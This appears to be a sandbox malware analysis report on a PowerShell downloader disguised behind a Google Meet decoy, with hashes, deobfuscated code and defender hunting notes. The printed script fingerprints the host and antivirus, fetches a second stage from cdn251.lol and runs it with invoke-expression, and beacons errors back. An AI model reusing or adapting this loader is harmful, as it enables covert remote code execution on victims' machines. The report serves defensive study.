General

  • Target

    f4052e52fed661fd05ea39a5187781ec6c234c5d7ea4ab91cd77f2e1d2c709b5.ps1

  • Size

    2KB

  • MD5

    797992ab276d218d7feb2e6e8b2fd678

  • SHA1

    99cfbecaebc79e723603997fb2102363319103eb

  • SHA256

    f4052e52fed661fd05ea39a5187781ec6c234c5d7ea4ab91cd77f2e1d2c709b5

  • SHA512

    702007e1ea9df25b54d996a8fcfea344812bd58f5fe70b1e7d1ba528ee1968148536c7a4c8bcd8e22d2087d539485fcd63e639449f1243cea62d513d82952479

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
# Sandbox deobfuscation of a PowerShell downloader/loader (sample hash in the
# report header). The whole first stage runs inside a background job started
# with start-job; the foreground then opens a browser URL and finally blocks on
# the job with receive-job -wait.
#
# What the visible code does, in order:
#   1. Host fingerprinting via WMI: OS caption (win32_operatingsystem), machine
#      domain (win32_computersystem) and the display names of installed AV
#      products (root\SecurityCenter2 / antivirusproduct, joined with ", "),
#      plus a freshly generated GUID ($k) used as a per-run identifier.
#   2. A net.webclient with a fixed "myUserAgentHere" User-Agent header fetches
#      a string from a cdn251.lol URL whose query string carries the
#      fingerprint; the response is base64-decoded as UTF-16 (Encoding::Unicode)
#      and passed to invoke-expression, i.e. a second stage is executed in-memory.
#   3. If that throws, the exception message is sent to a second cdn251.lol URL
#      together with the same GUID (error/telemetry beacon); its response is
#      stored but not executed in the visible code.
#
# Detection / hunting notes for defenders: a single scriptblock that queries
# root\SecurityCenter2 and then calls WebClient.DownloadString followed by
# Invoke-Expression; outbound HTTPS to cdn251.lol with the fixed User-Agent
# above; a start-job immediately followed by start-process of a browser URL.
# $zxquastizc ("25"), $rwahcfhhgcv (a hard-coded GUID) and $gg ("w") are
# constants echoed back in the query string, presumably campaign/version tags
# (not confirmable from this listing). $mvussbghokltiqu ("usradm") is assigned
# but never used in the visible code. The comma-separated statements on the
# first line and the bare digits on their own lines are artefacts of how the
# report renders the deobfuscated script, not of the original sample.
$tsu = start-job -scriptblock {$tojnrfynzfvhghjjeatkcmx = (get-wmiobject -class win32_operatingsystem).caption, $zxquastizc = "25", $rwahcfhhgcv = "ff4fbe21-02b8-45f5-b5ab-42fa6a1cec01", $qykeahwbjypm = [system.net.webutility]::urlencode($tojnrfynzfvhghjjeatkcmx), $qmxknzbooxjsidx = get-wmiobject win32_computersystem|select-object -expandproperty domain, $kquckngc = get-wmiobject -namespace "root\\SecurityCenter2" -class antivirusproduct, $ztvdn = $kquckngc|%{$_.displayname}, $rbbkcuguwik = $ztvdn -join ", ", $gg = "w", $k = new-guid.tostring(), $skehhlokjcaampj = new-object net.webclient, ($skehhlokjcaampj.headers).add("User-Agent", "myUserAgentHere"), $okflyzxcusbnfwvaq = "?dnrfahca=$rbbKcuGuWIK&KBNqDGNqaeqyqaCz=$qMXknZBOOXJSidX&jtPCbNFlNabPPEiFiHyvHgu=$qYKEAHwBjYPm&HfKVWACyCWmHU=$($ZXQUastIZC)&SunLGYEARVktztLG=$rWaHcFHHgcv&File=file&siOHQbxZZdt=$gg&tMDrrMJJuxLLkxxvZAwkHykMn=$K", $dnlqx = "https://cdn251.lol/73689d8a-25b4-41cf-b693-05591ed804a7-7433f7b1-9997-477b-aadc-5a6e8d233c61" + "$($oKflyzXCUsbNfWVAq)", $hpckuedgcmf = $skehhlokjcaampj.downloadstring($dnlqx), $cfssdhomsqwzrun = ([system.text.encoding]::unicode).getstring([system.convert]::frombase64string($hpckuedgcmf)), $mvussbghokltiqu = "usradm", try {
2
# Second-stage execution: the decoded download is evaluated as PowerShell
# inside the job. This is the point a script-block logging / AMSI control
# would observe the real payload.
invoke-expression $cfssdhomsqwzrun
3
} catch {
4
# Error beacon: the exception text and the run GUID are sent to a second URL.
$pszbonzfod = $_.exception.message
5
$xdomplpagktxgmzna = "?tMDrrMJJuxLLkxxvZAwkHykMn=$($K)&UxjPbyxEvOIwrPK=$($PSzBoNzfoD)"
6
$mjzwzclrk = "https://cdn251.lol/223dc805-5605-4a0b-b828-cdad1b84126e-79d39c2c-0f10-48d1-9edf-c18a784efba0" + "$($XdOmPLPagKTXgmZna)"
7
# The beacon response is stored but not executed in the visible code.
$hpckuedgcmf = $skehhlokjcaampj.downloadstring($mjzwzclrk)
8
}
9
}
10
# Foreground: open Google Meet in the default handler while the job runs in
# the background — presumably a decoy so the user sees a legitimate page.
$secjlpfqfqimrcxfcnqrwpk = "https://meet.google.com/"
11
start-process "https://meet.google.com/"
12
# Block until the background job has finished (i.e. the download + IEX above).
receive-job -job $tsu -wait
URLs
exe.dropper

https://meet.google.com/

Signatures

Files

  • f4052e52fed661fd05ea39a5187781ec6c234c5d7ea4ab91cd77f2e1d2c709b5.ps1
    .ps1
